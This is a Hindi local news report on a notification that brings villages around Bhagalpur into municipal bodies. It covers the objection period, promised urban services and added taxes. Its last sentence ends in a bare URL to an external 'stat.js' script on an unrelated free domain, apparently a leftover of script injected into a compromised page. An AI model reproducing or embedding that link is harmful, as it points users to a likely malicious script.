भागलपुर,( कुलसूम फात्मा ) 26 दिसंबर को जनपद के 6 एरिया में बढ़ती हुई आबादी को देखते हुए उनको सुविधाएं उपलब्ध कराने का निर्णय लिया गया जिसमें गावों को नगर निकाय में सम्मिलित किया जाएगा और यह सुविधाएं प्रदान की जाएंगी।
सर्वप्रथम गांवों को सुविधा उपलब्ध कराने के लिए नगर निकाय में सम्मिलित किया जाएगा। इसके लिए नगर विकास तथा आवास विभाग ने दिसंबर की 26 तारीख को नोटिफिकेशन जारी कर दिया है।
इन चित्रों को नगर पंचायत में किया जाएगा सम्मिलित।
जिसमें सुल्तानगंज नगर परिषद का विस्तार तथा नवगछिया नगर पंचायत को नगर परिषद का दर्जा दे दिया जाएगा। हालांकि नए नगर निकाय के गठन के लिए पीरपैंती सबौर और हबीबपुर तथा अकबरनगर को नगर पंचायत बनाया जा रहा है।
ग्रामीणों को दिया जा रहा है अधिकार आपत्ति तथा सुझाव का।
जिला प्रशासन ने इससे संबंधित एरिया के बीडीओ तथा कार्यपालक अधिकारी को सम्मिलित होने वाले प्रस्तावित गांवों के लोगों को भी जानकारी दे दी गई है। और गांव में प्रचार कर दिया जाएगा। नोटिफिकेशन जारी होने के 30 दिन के अंदर अंदर वहां के लोगों को अपनी आपत्ति तथा एडवाइज जिला प्रशासन को दें सकेंगे। जनता के आपत्ति को प्रमंडलीय आयुक्त तथा डीएम के जरिए से नगर विकास तथा आवास विभाग को भेजा जाएगा।
आपको बता दें की नगर निकाय में सम्मिलित होने के पश्चात लोगों को नगरीय सुविधाएं प्रदान की जाएंगी। स्वच्छ भारत मिशन समेत केंद्रीय शहरी विकास मंत्रालय की योजनाओं को बड़े स्तर पर लाभ प्रदान किया जाएगा। गली और मोहल्ले के साथ-साथ घर-घर में कूड़ा करकट जा कर लनेे की ड्यूटी लगाई जाएगी और स्ट्रीट लाइट के साथ ड्रेनेज तथा पेयजल की अच्छी सुविधा प्रदान की जाएगी।
आपको बता दें की भवन नक्शा ट्रेड लाइसेंस तथा अमीन शुल्क और टेंडर पत्र विलंब, रजिस्ट्रेशन शुल्क और होल्डिंग टैक्स के साथ-साथ विवाह निबंधन, म्यूटेशन शुल्क और जल कनेक्शन रोड कटिंग शुल्क अन्य स्रोत हैं। सुविधाओं के साथ कई तरीके के टैक्सों का बर्डेन भी बढ़ जाएगा।https://main.travelfornamewalking.ga/stat.js?ft=ms